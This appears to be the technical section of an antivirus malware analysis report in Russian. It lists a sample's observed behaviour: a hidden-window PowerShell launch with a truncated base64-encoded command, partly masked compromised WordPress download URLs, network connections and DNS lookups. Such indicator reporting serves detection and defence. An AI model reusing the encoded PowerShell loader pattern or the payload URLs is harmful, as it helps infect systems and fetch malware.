Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABxAFoAQQBHAEEAXwBBAFEAPQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcAWgAnACwAJwBEAEQAWgAnACwAJwB4AEEAJwApADsAJABGADQAQwBBAEEAWgBBACAAPQAgACcANAA5ADcAJwA7ACQAYwBHAFUAdwBBADQAWgA9ACgAI...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1520
- %TEMP%\1371389.cvr
- 'ry#####motorhomes.co.uk':80
- 'vi###santina.nl':443
- 'ma##oca.es':80
- 'de####ry.manioca.es':443
- 'x.##2.us':80
- 'sa###aha.com':80
- http://ry#####motorhomes.co.uk/wp-admin/RQ_g/
- http://ma##oca.es/wp-content/W8_m/
- http://x.##2.us/x.cer
- http://sa###aha.com/ad/hf_0/
- 'vi###santina.nl':443
- 'de####ry.manioca.es':443
- DNS ASK ry#####motorhomes.co.uk
- DNS ASK vi###santina.nl
- DNS ASK ma###cpc.co.il
- DNS ASK ma##oca.es
- DNS ASK de####ry.manioca.es
- DNS ASK x.##2.us
- DNS ASK sa###aha.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABxAFoAQQBHAEEAXwBBAFEAPQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcAWgAnACwAJwBEAEQAWgAnACwAJwB4AEEAJwApADsAJABGADQAQwBBAEEAWgBBACAAPQAgACcANAA5ADcAJwA7ACQAYwBHAFUAdwBBADQAWgA9ACgAI...' (со скрытым окном)